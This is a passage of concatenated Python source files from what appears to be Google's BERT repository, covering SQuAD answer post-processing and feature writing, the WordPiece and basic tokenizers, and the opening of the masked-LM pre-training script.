writer.write(json.dumps(all_nbest_json, indent=4) + "\n") if FLAGS.version_2_with_negative: with tf.gfile.GFile(output_null_log_odds_file, "w") as writer: writer.write(json.dumps(scores_diff_json, indent=4) + "\n") def get_final_text(pred_text, orig_text, do_lower_case): """Project the tokenized prediction back to the original text.""" # When we created the data, we kept track of the alignment between original # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So # now `orig_text` contains the span of our original text corresponding to the # span that we predicted. # # However, `orig_text` may contain extra characters that we don't want in # our prediction. # # For example, let's say: # pred_text = steve smith # orig_text = Steve Smith's # # We don't want to return `orig_text` because it contains the extra "'s". # # We don't want to return `pred_text` because it's already been normalized # (the SQuAD eval script also does punctuation stripping/lower casing but # our tokenizer does additional normalization like stripping accent # characters). # # What we really want to return is "Steve Smith". # # Therefore, we have to apply a semi-complicated alignment heruistic between # `pred_text` and `orig_text` to get a character-to-charcter alignment. This # can fail in certain cases in which case we just return `orig_text`. def _strip_spaces(text): ns_chars = [] ns_to_s_map = collections.OrderedDict() for (i, c) in enumerate(text): if c == " ": continue ns_to_s_map[len(ns_chars)] = i ns_chars.append(c) ns_text = "".join(ns_chars) return (ns_text, ns_to_s_map) # We first tokenize `orig_text`, strip whitespace from the result # and `pred_text`, and check if they are the same length. If they are # NOT the same length, the heuristic has failed. If they are the same # length, we assume the characters are one-to-one aligned. tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case) tok_text = " ".join(tokenizer.tokenize(orig_text)) start_position = tok_text.find(pred_text) if start_position == -1: if FLAGS.verbose_logging: tf.logging.info( "Unable to find text: '%s' in '%s'" % (pred_text, orig_text)) return orig_text end_position = start_position + len(pred_text) - 1 (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text) (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text) if len(orig_ns_text) != len(tok_ns_text): if FLAGS.verbose_logging: tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'", orig_ns_text, tok_ns_text) return orig_text # We then project the characters in `pred_text` back to `orig_text` using # the character-to-character alignment. tok_s_to_ns_map = {} for (i, tok_index) in six.iteritems(tok_ns_to_s_map): tok_s_to_ns_map[tok_index] = i orig_start_position = None if start_position in tok_s_to_ns_map: ns_start_position = tok_s_to_ns_map[start_position] if ns_start_position in orig_ns_to_s_map: orig_start_position = orig_ns_to_s_map[ns_start_position] if orig_start_position is None: if FLAGS.verbose_logging: tf.logging.info("Couldn't map start position") return orig_text orig_end_position = None if end_position in tok_s_to_ns_map: ns_end_position = tok_s_to_ns_map[end_position] if ns_end_position in orig_ns_to_s_map: orig_end_position = orig_ns_to_s_map[ns_end_position] if orig_end_position is None: if FLAGS.verbose_logging: tf.logging.info("Couldn't map end position") return orig_text output_text = orig_text[orig_start_position:(orig_end_position + 1)] return output_text def _get_best_indexes(logits, n_best_size): """Get the n-best logits from a list.""" index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True) best_indexes = [] for i in range(len(index_and_score)): if i >= n_best_size: break best_indexes.append(index_and_score[i][0]) return best_indexes def _compute_softmax(scores): """Compute softmax probability over raw logits.""" if not scores: return [] max_score = None for score in scores: if max_score is None or score > max_score: max_score = score exp_scores = [] total_sum = 0.0 for score in scores: x = math.exp(score - max_score) exp_scores.append(x) total_sum += x probs = [] for score in exp_scores: probs.append(score / total_sum) return probs class FeatureWriter(object): """Writes InputFeature to TF example file.""" def __init__(self, filename, is_training): self.filename = filename self.is_training = is_training self.num_features = 0 self._writer = tf.python_io.TFRecordWriter(filename) def process_feature(self, feature): """Write a InputFeature to the TFRecordWriter as a tf.train.Example.""" self.num_features += 1 def create_int_feature(values): feature = tf.train.Feature( int64_list=tf.train.Int64List(value=list(values))) return feature features = collections.OrderedDict() features["unique_ids"] = create_int_feature([feature.unique_id]) features["input_ids"] = create_int_feature(feature.input_ids) features["input_mask"] = create_int_feature(feature.input_mask) features["segment_ids"] = create_int_feature(feature.segment_ids) if self.is_training: features["start_positions"] = create_int_feature([feature.start_position]) features["end_positions"] = create_int_feature([feature.end_position]) impossible = 0 if feature.is_impossible: impossible = 1 features["is_impossible"] = create_int_feature([impossible]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) self._writer.write(tf_example.SerializeToString()) def close(self): self._writer.close() def validate_flags_or_throw(bert_config): """Validate the input FLAGS or throw an exception.""" tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint) if not FLAGS.do_train and not FLAGS.do_predict: raise ValueError("At least one of `do_train` or `do_predict` must be True.") if FLAGS.do_train: if not FLAGS.train_file: raise ValueError( "If `do_train` is True, then `train_file` must be specified.") if FLAGS.do_predict: if not FLAGS.predict_file: raise ValueError( "If `do_predict` is True, then `predict_file` must be specified.") if FLAGS.max_seq_length > bert_config.max_position_embeddings: raise ValueError( "Cannot use sequence length %d because the BERT model " "was only trained up to sequence length %d" % (FLAGS.max_seq_length, bert_config.max_position_embeddings)) if FLAGS.max_seq_length <= FLAGS.max_query_length + 3: raise ValueError( "The max_seq_length (%d) must be greater than max_query_length " "(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length)) def main(_): tf.logging.set_verbosity(tf.logging.INFO) bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) validate_flags_or_throw(bert_config) tf.gfile.MakeDirs(FLAGS.output_dir) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = read_squad_examples( input_file=FLAGS.train_file, is_training=True) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) # Pre-shuffle the input to avoid having to make a very large shuffle # buffer in in the `input_fn`. rng = random.Random(12345) rng.shuffle(train_examples) model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, predict_batch_size=FLAGS.predict_batch_size) if FLAGS.do_train: # We write to a temporary file to avoid storing very large constant tensors # in memory. train_writer = FeatureWriter( filename=os.path.join(FLAGS.output_dir, "train.tf_record"), is_training=True) convert_examples_to_features( examples=train_examples, tokenizer=tokenizer, max_seq_length=FLAGS.max_seq_length, doc_stride=FLAGS.doc_stride, max_query_length=FLAGS.max_query_length, is_training=True, output_fn=train_writer.process_feature) train_writer.close() tf.logging.info("***** Running training *****") tf.logging.info(" Num orig examples = %d", len(train_examples)) tf.logging.info(" Num split examples = %d", train_writer.num_features) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) del train_examples train_input_fn = input_fn_builder( input_file=train_writer.filename, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_predict: eval_examples = read_squad_examples( input_file=FLAGS.predict_file, is_training=False) eval_writer = FeatureWriter( filename=os.path.join(FLAGS.output_dir, "eval.tf_record"), is_training=False) eval_features = [] def append_feature(feature): eval_features.append(feature) eval_writer.process_feature(feature) convert_examples_to_features( examples=eval_examples, tokenizer=tokenizer, max_seq_length=FLAGS.max_seq_length, doc_stride=FLAGS.doc_stride, max_query_length=FLAGS.max_query_length, is_training=False, output_fn=append_feature) eval_writer.close() tf.logging.info("***** Running predictions *****") tf.logging.info(" Num orig examples = %d", len(eval_examples)) tf.logging.info(" Num split examples = %d", len(eval_features)) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) all_results = [] predict_input_fn = input_fn_builder( input_file=eval_writer.filename, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=False) # If running eval on the TPU, you will need to specify the number of # steps. all_results = [] for result in estimator.predict( predict_input_fn, yield_single_examples=True): if len(all_results) % 1000 == 0: tf.logging.info("Processing example: %d" % (len(all_results))) unique_id = int(result["unique_ids"]) start_logits = [float(x) for x in result["start_logits"].flat] end_logits = [float(x) for x in result["end_logits"].flat] all_results.append( RawResult( unique_id=unique_id, start_logits=start_logits, end_logits=end_logits)) output_prediction_file = os.path.join(FLAGS.output_dir, "predictions.json") output_nbest_file = os.path.join(FLAGS.output_dir, "nbest_predictions.json") output_null_log_odds_file = os.path.join(FLAGS.output_dir, "null_odds.json") write_predictions(eval_examples, eval_features, all_results, FLAGS.n_best_size, FLAGS.max_answer_length, FLAGS.do_lower_case, output_prediction_file, output_nbest_file, output_null_log_odds_file) if __name__ == "__main__": flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: __init__.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. File: tokenization.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tokenization classes.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import re import unicodedata import six import tensorflow as tf def validate_case_matches_checkpoint(do_lower_case, init_checkpoint): """Checks whether the casing config is consistent with the checkpoint name.""" # The casing has to be passed in by the user and there is no explicit check # as to whether it matches the checkpoint. The casing information probably # should have been stored in the bert_config.json file, but it's not, so # we have to heuristically detect it to validate. if not init_checkpoint: return m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint) if m is None: return model_name = m.group(1) lower_models = [ "uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12", "multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12" ] cased_models = [ "cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16", "multi_cased_L-12_H-768_A-12" ] is_bad_config = False if model_name in lower_models and not do_lower_case: is_bad_config = True actual_flag = "False" case_name = "lowercased" opposite_flag = "True" if model_name in cased_models and do_lower_case: is_bad_config = True actual_flag = "True" case_name = "cased" opposite_flag = "False" if is_bad_config: raise ValueError( "You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. " "However, `%s` seems to be a %s model, so you " "should pass in `--do_lower_case=%s` so that the fine-tuning matches " "how the model was pre-training. If this error is wrong, please " "just comment out this check." % (actual_flag, init_checkpoint, model_name, case_name, opposite_flag)) def convert_to_unicode(text): """Converts `text` to Unicode (if it's not already), assuming utf-8 input.""" if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text.decode("utf-8", "ignore") elif isinstance(text, unicode): return text else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def printable_text(text): """Returns text encoded in a way suitable for print or `tf.logging`.""" # These functions want `str` for both Python2 and Python3, but in one case # it's a Unicode string and in the other it's a byte string. if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text elif isinstance(text, unicode): return text.encode("utf-8") else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def load_vocab(vocab_file): """Loads a vocabulary file into a dictionary.""" vocab = collections.OrderedDict() index = 0 with tf.gfile.GFile(vocab_file, "r") as reader: while True: token = convert_to_unicode(reader.readline()) if not token: break token = token.strip() vocab[token] = index index += 1 return vocab def convert_by_vocab(vocab, items): """Converts a sequence of [tokens|ids] using the vocab.""" output = [] for item in items: output.append(vocab[item]) return output def convert_tokens_to_ids(vocab, tokens): return convert_by_vocab(vocab, tokens) def convert_ids_to_tokens(inv_vocab, ids): return convert_by_vocab(inv_vocab, ids) def whitespace_tokenize(text): """Runs basic whitespace cleaning and splitting on a piece of text.""" text = text.strip() if not text: return [] tokens = text.split() return tokens class FullTokenizer(object): """Runs end-to-end tokenziation.""" def __init__(self, vocab_file, do_lower_case=True): self.vocab = load_vocab(vocab_file) self.inv_vocab = {v: k for k, v in self.vocab.items()} self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case) self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab) def tokenize(self, text): split_tokens = [] for token in self.basic_tokenizer.tokenize(text): for sub_token in self.wordpiece_tokenizer.tokenize(token): split_tokens.append(sub_token) return split_tokens def convert_tokens_to_ids(self, tokens): return convert_by_vocab(self.vocab, tokens) def convert_ids_to_tokens(self, ids): return convert_by_vocab(self.inv_vocab, ids) class BasicTokenizer(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.).""" def __init__(self, do_lower_case=True): """Constructs a BasicTokenizer. Args: do_lower_case: Whether to lower case the input. """ self.do_lower_case = do_lower_case def tokenize(self, text): """Tokenizes a piece of text.""" text = convert_to_unicode(text) text = self._clean_text(text) # This was added on November 1st, 2018 for the multilingual and Chinese # models. This is also applied to the English models now, but it doesn't # matter since the English models were not trained on any Chinese data # and generally don't have any Chinese data in them (there are Chinese # characters in the vocabulary because Wikipedia does have some Chinese # words in the English Wikipedia.). text = self._tokenize_chinese_chars(text) orig_tokens = whitespace_tokenize(text) split_tokens = [] for token in orig_tokens: if self.do_lower_case: token = token.lower() token = self._run_strip_accents(token) split_tokens.extend(self._run_split_on_punc(token)) output_tokens = whitespace_tokenize(" ".join(split_tokens)) return output_tokens def _run_strip_accents(self, text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def _run_split_on_punc(self, text): """Splits punctuation on a piece of text.""" chars = list(text) i = 0 start_new_word = True output = [] while i < len(chars): char = chars[i] if _is_punctuation(char): output.append([char]) start_new_word = True else: if start_new_word: output.append([]) start_new_word = False output[-1].append(char) i += 1 return ["".join(x) for x in output] def _tokenize_chinese_chars(self, text): """Adds whitespace around any CJK character.""" output = [] for char in text: cp = ord(char) if self._is_chinese_char(cp): output.append(" ") output.append(char) output.append(" ") else: output.append(char) return "".join(output) def _is_chinese_char(self, cp): """Checks whether CP is the codepoint of a CJK character.""" # This defines a "chinese character" as anything in the CJK Unicode block: # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) # # Note that the CJK Unicode block is NOT all Japanese and Korean characters, # despite its name. The modern Korean Hangul alphabet is a different block, # as is Japanese Hiragana and Katakana. Those alphabets are used to write # space-separated words, so they are not treated specially and handled # like the all of the other languages. if ((cp >= 0x4E00 and cp <= 0x9FFF) or # (cp >= 0x3400 and cp <= 0x4DBF) or # (cp >= 0x20000 and cp <= 0x2A6DF) or # (cp >= 0x2A700 and cp <= 0x2B73F) or # (cp >= 0x2B740 and cp <= 0x2B81F) or # (cp >= 0x2B820 and cp <= 0x2CEAF) or (cp >= 0xF900 and cp <= 0xFAFF) or # (cp >= 0x2F800 and cp <= 0x2FA1F)): # return True return False def _clean_text(self, text): """Performs invalid character removal and whitespace cleanup on text.""" output = [] for char in text: cp = ord(char) if cp == 0 or cp == 0xfffd or _is_control(char): continue if _is_whitespace(char): output.append(" ") else: output.append(char) return "".join(output) class WordpieceTokenizer(object): """Runs WordPiece tokenziation.""" def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200): self.vocab = vocab self.unk_token = unk_token self.max_input_chars_per_word = max_input_chars_per_word def tokenize(self, text): """Tokenizes a piece of text into its word pieces. This uses a greedy longest-match-first algorithm to perform tokenization using the given vocabulary. For example: input = "unaffable" output = ["un", "##aff", "##able"] Args: text: A single token or whitespace separated tokens. This should have already been passed through `BasicTokenizer. Returns: A list of wordpiece tokens. """ text = convert_to_unicode(text) output_tokens = [] for token in whitespace_tokenize(text): chars = list(token) if len(chars) > self.max_input_chars_per_word: output_tokens.append(self.unk_token) continue is_bad = False start = 0 sub_tokens = [] while start < len(chars): end = len(chars) cur_substr = None while start < end: substr = "".join(chars[start:end]) if start > 0: substr = "##" + substr if substr in self.vocab: cur_substr = substr break end -= 1 if cur_substr is None: is_bad = True break sub_tokens.append(cur_substr) start = end if is_bad: output_tokens.append(self.unk_token) else: output_tokens.extend(sub_tokens) return output_tokens def _is_whitespace(char): """Checks whether `chars` is a whitespace character.""" # \t, \n, and \r are technically contorl characters but we treat them # as whitespace since they are generally considered as such. if char == " " or char == "\t" or char == "\n" or char == "\r": return True cat = unicodedata.category(char) if cat == "Zs": return True return False def _is_control(char): """Checks whether `chars` is a control character.""" # These are technically control characters but we count them as whitespace # characters. if char == "\t" or char == "\n" or char == "\r": return False cat = unicodedata.category(char) if cat in ("Cc", "Cf"): return True return False def _is_punctuation(char): """Checks whether `chars` is a punctuation character.""" cp = ord(char) # We treat all non-letter/number ASCII as punctuation. # Characters such as "^", "$", and "`" are not in the Unicode # Punctuation class but we treat them as punctuation anyways, for # consistency. if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)): return True cat = unicodedata.category(char) if cat.startswith("P"): return True return False File: run_pretraining.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run masked LM/next sentence masked_lm pre-training for BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import modeling import optimization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string( "input_file", None, "Input TF example files (can be a glob or comma separated).") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded. Must match data generation.") flags.DEFINE_integer( "max_predictions_per_seq", 20, "Maximum number of masked LM predictions per sequence. " "Must match data generation.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.") flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") def model_fn_builder(bert_config, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] masked_lm_positions = features["masked_lm_positions"] masked_lm_ids = features["masked_lm_ids"] masked_lm_weights = features["masked_lm_weights"] next_sentence_labels = features["next_sentence_labels"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) (masked_lm_loss, masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output( bert_config, model.get_sequence_output(), model.get_embedding_table(), masked_lm_positions, masked_lm_ids, masked_lm_weights) (next_sentence_loss, next_sentence_example_loss, next_sentence_log_probs) = get_next_sentence_output( bert_config, model.get_pooled_output(), next_sentence_labels) total_loss = masked_lm_loss + next_sentence_loss tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids, masked_lm_weights, next_sentence_example_loss, next_sentence_log_probs, next_sentence_labels): """Computes the loss and accuracy of the model.""" masked_lm_log_probs = tf.reshape(masked_lm_log_probs, [-1, masked_lm_log_probs.shape[-1]]) masked_lm_predictions = tf.argmax( masked_lm_log_probs, axis=-1, output_type=tf.int32) masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1]) masked_lm_ids = tf.reshape(masked_lm_ids, [-1]) masked_lm_weights = tf.reshape(masked_lm_weights, [-1]) masked_lm_accuracy = tf.metrics.accuracy( labels=masked_lm_ids, predictions=masked_lm_predictions, weights=masked_lm_weights) masked_lm_mean_loss = tf.metrics.mean( values=masked_lm_example_loss, weights=masked_lm_weights) next_sentence_log_probs = tf.reshape( next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]]) next_sentence_predictions = tf.argmax( next_sentence_log_probs, axis=-1, output_type=tf.int32) next_sentence_labels = tf.reshape(next_sentence_labels, [-1]) next_sentence_accuracy = tf.metrics.accuracy( labels=next_sentence_labels, predictions=next_sentence_predictions) next_sentence_mean_loss = tf.metrics.mean( values=next_sentence_example_loss) return { "masked_lm_accuracy": masked_lm_accuracy, "masked_lm_loss": masked_lm_mean_loss, "next_sentence_accuracy": next_sentence_accuracy, "next_sentence_loss": next_sentence_mean_loss, } eval_metrics = (metric_fn, [ masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids, masked_lm_weights, next_sentence_example_loss, next_sentence_log_probs, next_sentence_labels ]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics, scaffold_fn=scaffold_fn) else: raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode)) return output_spec return model_fn def get_masked_lm_output(bert_config, input_tensor, output_weights, positions, label_ids, label_weights): """Get loss and log probs for the masked LM.""" input_tensor = gather_indexes(input_tensor, positions) with tf.variable_scope("cls/predictions"): # We apply one more non-linear transformation before the output layer. # This matrix is not used after pre-training. with tf.variable_scope("transform"): input_tensor = tf.layers.dense( input_tensor, units=bert_config.hidden_size, activation=modeling.get_activation(bert_config.hidden_act), kernel_initializer=modeling.create_initializer( bert_config.initializer_range)) input_tensor = modeling.layer_norm(input_tensor) # The output weights are the same as the input embeddings, but there is # an output-only bias for each token. output_bias = tf.get_variable( "output_bias", shape=[bert_config.vocab_size], initializer=tf.zeros_initializer()) logits = tf.matmul(input_tensor, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) log_probs = tf.nn.log_softmax(logits, axis=-1) label_ids = tf.reshape(label_ids, [-1]) label_weights = tf.reshape(label_weights, [-1]) one_hot_labels = tf.one_hot( label_ids, depth=bert_config.vocab_size, dtype=tf.float32) # The `positions` tensor might be zero-padded (if the sequence is too # short to have the maximum number of predictions). The `label_weights` # tensor has a value of 1.0 for every real prediction and 0.0 for the # padding predictions. per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1]) numerator = tf.reduce_sum(label_weights * per_example_loss) denominator = tf.reduce_sum(label_weights) + 1e-5 loss = numerator / denominator return (loss, per_example_loss, log_probs) def get_next_sentence_output(bert_config, input_tensor, labels): """Get loss and log probs for the next sentence prediction.""" # Simple binary classification. Note that 0 is "next sentence" and 1 is # "random sentence". This weight matrix is not used after pre-training. with tf.variable_scope("cls/seq_relationship"): output_weights = tf.get_variable( "output_weights", shape=[2, bert_config.hidden_size], initializer=modeling.create_initializer(bert_config.initializer_range)) output_bias = tf.get_variable( "output_bias", shape=[2], initializer=tf.zeros_initializer()) logits = tf.matmul(input_tensor, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) log_probs = tf.nn.log_softmax(logits, axis=-1) labels = tf.reshape(labels, [-1]) one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, log_probs) def gather_indexes(sequence_tensor, positions): """Gathers the vectors at the specific positions over a minibatch.""" sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3) batch_size = sequence_shape[0] seq_length = sequence_shape[1] width = sequence_shape[2] flat_offsets = tf.reshape( tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1]) flat_positions = tf.reshape(positions + flat_offsets, [-1]) flat_sequence_tensor = tf.reshape(sequence_tensor, [batch_size * seq_length, width]) output_tensor = tf.gather(flat_sequence_tensor, flat_positions) return output_tensor def input_fn_builder(input_files, max_seq_length, max_predictions_per_seq, is_training, num_cpu_threads=4): """Creates an `input_fn` closure to be passed to TPUEstimator.""" def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] name_to_features = { "input_ids": tf.FixedLenFeature([max_seq_length], tf.int64), "input_mask": tf.FixedLenFeature([max_seq_length], tf.int64), "segment_ids": tf.FixedLenFeature([max_seq_length], tf.int64), "masked_lm_positions": tf.FixedLenFeature([max_predictions_per_seq], tf.int64), "masked_lm_ids": tf.FixedLenFeature([max_predictions_per_seq], tf.int64), "masked_lm_weights": tf.FixedLenFeature([max_predictions_per_seq], tf.float32), "next_sentence_labels": tf.FixedLenFeature([1], tf.int64), } # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. if is_training: d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files)) d = d.repeat() d = d.shuffle(buffer_size=len(input_files)) # `cycle_length` is the number of parallel files that get read. cycle_length = min(num_cpu_threads, len(input_files)) # `sloppy` mode means that the interleaving is not exact. This adds # even more randomness to the training pipeline. d = d.apply( tf.contrib.data.parallel_interleave( tf.data.TFRecordDataset, sloppy=is_training, cycle_length=cycle_length)) d = d.shuffle(buffer_size=100) else: d = tf.data.TFRecordDataset(input_files) # Since we evaluate for a fixed number of steps we don't want to encounter # out-of-range exceptions. d = d.repeat() # We must `drop_remainder` on training because the TPU requires fixed # size dimensions. For eval, we assume we are evaluating on the CPU or GPU # and we *don't* want to drop the remainder, otherwise we wont cover # every sample. d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, num_parallel_batches=num_cpu_threads, drop_remainder=True)) return d return input_fn def _decode_record(record, 